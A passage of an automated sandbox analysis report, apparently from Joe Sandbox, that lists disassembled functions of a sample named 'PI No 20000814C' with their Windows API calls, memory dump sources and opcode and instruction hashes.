                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
                                    • Instruction ID: 3d8c8769bee754d40f3c5eaaf8b76585bcd3eea968b36e2a06b509a2689990f8
                                    • Opcode Fuzzy Hash: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
                                    • Instruction Fuzzy Hash: A8F03775A1130CBFDB04DFE09C89ABEBBB8EB08311F1044A9A901E2281E6746A189B50
                                    Function 00F0E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c794b4c7aa39bc5fb2ceabcefafde85cf9f049fc338abd89877530dc77a7e9c
                                    • Instruction ID: 0bef2d735a1b674342828fd70eec822c814575499c28afa73610949ba5bfe432
                                    • Opcode Fuzzy Hash: 7c794b4c7aa39bc5fb2ceabcefafde85cf9f049fc338abd89877530dc77a7e9c
                                    • Instruction Fuzzy Hash: 93229C75E00219CFDB24DF54C880BAABBB1FF04310F148969EC56AB391E774A985FB91
                                    Function 00F016DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • GetParent.USER32(?), ref: 00F3BA0A
                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00F019B3,?,?,?,00000006,?), ref: 00F3BA84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: dbd4fa16e18ff1ad468ec4bc81b6b66355a8a1846c7e4a003f58d97f19cf6c8c
                                    • Instruction ID: 8bf24fe7155cf8b74e5232c715b41105d4aa8215bf8bbb3952839fbcbd43dd0d
                                    • Opcode Fuzzy Hash: dbd4fa16e18ff1ad468ec4bc81b6b66355a8a1846c7e4a003f58d97f19cf6c8c
                                    • Instruction Fuzzy Hash: 5C218234A04508AFCF248F68CD99EA93B96AF49334F584254FA159B2E2CB319D51BB50
                                    Function 00F6C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F6C966
                                    • FindClose.KERNEL32(00000000), ref: 00F6C996
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 99dcc5fb9d8e23c80e91e27c9e8d324046367bf1b06b6d15db1bd6f0ea16c8f2
                                    • Instruction ID: 50b3fac73b3f85db9ec20fe3730d8eef0e5f5998b06372adc20d25ef8faba5c9
                                    • Opcode Fuzzy Hash: 99dcc5fb9d8e23c80e91e27c9e8d324046367bf1b06b6d15db1bd6f0ea16c8f2
                                    • Instruction Fuzzy Hash: AB118E326142049FDB10EF29C845A2AF7E9EF84320F00851EF8AAD7291DB74AC04EB81
                                    Function 00F8C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00F3BB8A,?,?,?), ref: 00F8C8E1
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F8C8C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: 06c6612cda52af52668d09f3ad7a7e8d11aa6a13e12026c2bb5aef19c51e9d16
                                    • Instruction ID: 126f983fd90320a4c980d2290d9fc6ec118f7efa84cae7e0b4eb248d52d1597a
                                    • Opcode Fuzzy Hash: 06c6612cda52af52668d09f3ad7a7e8d11aa6a13e12026c2bb5aef19c51e9d16
                                    • Instruction Fuzzy Hash: 7401D831240204AFDB216F14CC49FB63BA6FF85324F140528F9514B2E1CB315815FBB1
                                    Function 00F8CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 00F8CC51
                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00F3BC66,?,?,?,?,?), ref: 00F8CC7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: bc9087c01eacea136e0a5a46fa68208db71a12ff4784e557a598786ede0366a2
                                    • Instruction ID: 31543615490042cd59ec6344ac34ade61dbffb4ead5a9dafd89480653d0555e9
                                    • Opcode Fuzzy Hash: bc9087c01eacea136e0a5a46fa68208db71a12ff4784e557a598786ede0366a2
                                    • Instruction Fuzzy Hash: 27F0677241021CBFEB048F85DC09DFE7BB8EB08321F00006AF801A2161C371AA24EBA0
                                    Function 00F6A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F7977D,?,00F8FB84,?), ref: 00F6A302
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F7977D,?,00F8FB84,?), ref: 00F6A314
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: fbe05d49353b3009ad1ad769570ee0be8e626cffc1570233a8163dcf8083eeb2
                                    • Instruction ID: 310d65d0704975cbdca49df341a480fa4fa1950248db62be73b774ccc6af3d7b
                                    • Opcode Fuzzy Hash: fbe05d49353b3009ad1ad769570ee0be8e626cffc1570233a8163dcf8083eeb2
                                    • Instruction Fuzzy Hash: A9F0E23150432DABDB10AFA4CC49FEA736CBF08361F004165B808D6281D6309944EBE1
                                    Function 00F8CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F8CD74
                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00F3BBE5,?,?,?,?), ref: 00F8CDA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: adfdad419fabe466984ed9591073e5981cde6120fca868919e4f61dd9e9273ee
                                    • Instruction ID: 74ae5431ed42cf1d14e6f7ab87c3cb0c1b858a4caa5e20dba3baacbe9c8c49f2
                                    • Opcode Fuzzy Hash: adfdad419fabe466984ed9591073e5981cde6120fca868919e4f61dd9e9273ee
                                    • Instruction Fuzzy Hash: 6BE08671200258BFEB146F19DC0AFFA3B54EB04760F408625F966DE1E1C7709850E770
                                    Function 00F58713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58851), ref: 00F58728
                                    • CloseHandle.KERNEL32(?,?,00F58851), ref: 00F5873A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 51c463807fd60f7699c0f2e0f808fbc02dc90ff880265a3f78a29231164dc07b
                                    • Instruction ID: 6fc81c9b495af0296268dca780671b6443c0cbba67ae950aa89f7f64bafc1f2b
                                    • Opcode Fuzzy Hash: 51c463807fd60f7699c0f2e0f808fbc02dc90ff880265a3f78a29231164dc07b
                                    • Instruction Fuzzy Hash: F7E0B676010654EFE7252B60FC09DB77BA9FB043617248829B99680470DB62AC95EB10
                                    Function 00F2A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00F94178,00F28F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00F2A39A
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F2A3A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 6fd2d5e14cfe4ee8919ec2172dfd2d0b19234aa62966ab103da46f9760dab0ff
                                    • Instruction ID: 72ae1cbdcd04d6263e6e087ae247b2aeb1574f8f1d384763512848cf1f231635
                                    • Opcode Fuzzy Hash: 6fd2d5e14cfe4ee8919ec2172dfd2d0b19234aa62966ab103da46f9760dab0ff
                                    • Instruction Fuzzy Hash: DEB0923125430CAFCA002B91EC0DBE83F68EB46AA2F404020F60D84060CB625454AB91
                                    Function 00F2F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2320d09debb1a45782e45f8458214d6c1bb63beeb748b7a8b41b739c1eb94955
                                    • Instruction ID: 94455dfdd14ea389e89c43d5a3d17526a8ac4e424b196d272cf3ab40b7ddc53a
                                    • Opcode Fuzzy Hash: 2320d09debb1a45782e45f8458214d6c1bb63beeb748b7a8b41b739c1eb94955
                                    • Instruction Fuzzy Hash: 32322722D79F154DD723AA34D832335A258AFB73D4F15D737F819B5AAAEB28C4836100
                                    Function 00F3267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a3d99d38b2496105061ed5e48d25eb6713dcc04d22f11cf8a211d348e5ebec33
                                    • Instruction ID: 7de116de6125d64c52e30706cfaa666822ed18b5ce936f2f41735c1c57b6908c
                                    • Opcode Fuzzy Hash: a3d99d38b2496105061ed5e48d25eb6713dcc04d22f11cf8a211d348e5ebec33
                                    • Instruction Fuzzy Hash: 14B1EF20D2AF454DD62397398831336BA4CAFBB2D5F51D71BFC2670D22EB2285836181
                                    Function 00F68B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • __time64.LIBCMT ref: 00F68B25
                                      • Part of subcall function 00F2543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F691F8,00000000,?,?,?,?,00F693A9,00000000,?), ref: 00F25443
                                      • Part of subcall function 00F2543A: __aulldiv.LIBCMT ref: 00F25463
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: a9e48bd16312b66f3d20cd18cff8079aeef38b10df9e4aac6b4f10081c938350
                                    • Instruction ID: 881d5cde82bcfc13a0aa2f873ae3872424dab31b5ef09e058e4ee29bc2958f62
                                    • Opcode Fuzzy Hash: a9e48bd16312b66f3d20cd18cff8079aeef38b10df9e4aac6b4f10081c938350
                                    • Instruction Fuzzy Hash: 2F21B4726356108FC729CF25D841A52B3E1EBA5321B288F6CD1E5CB2D0CA74B945DF94
                                    Function 00F8DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F8DB46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: fdee014ff24584433904e710b2d465c589edee2da79f0bc0a4d7aa574d45976c
                                    • Instruction ID: 4d3f1451f827daf8bd70a1780e51a849870d83dd8e8aa6c695e0a46dd8f774a7
                                    • Opcode Fuzzy Hash: fdee014ff24584433904e710b2d465c589edee2da79f0bc0a4d7aa574d45976c
                                    • Instruction Fuzzy Hash: A111A771204165BAEB28BE2CCD0AFFA3755EF85B30F244215F9519B2D2CB649D00B365
                                    Function 00F8D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00F3BBA2,?,?,?,?,00000000,?), ref: 00F8D740
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 2e351e7429e16b3d5c1c8162cbcec416aa9f46bf9d99927febd8b089851d2278
                                    • Instruction ID: b6af93a08b3de3abd30ddf65bb1d4f1bda70d40bd688d74f6a042ccc1729adaf
                                    • Opcode Fuzzy Hash: 2e351e7429e16b3d5c1c8162cbcec416aa9f46bf9d99927febd8b089851d2278
                                    • Instruction Fuzzy Hash: 4E01F135A00018ABDF14AF29C889EFE3BA6EF85334F080125F9165B1D2C330AC21B7A0
                                    Function 00F8C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
                                      • Part of subcall function 00F02344: ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00F3BC4F,?,?,?,?,?,00000001,?), ref: 00F8C272
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
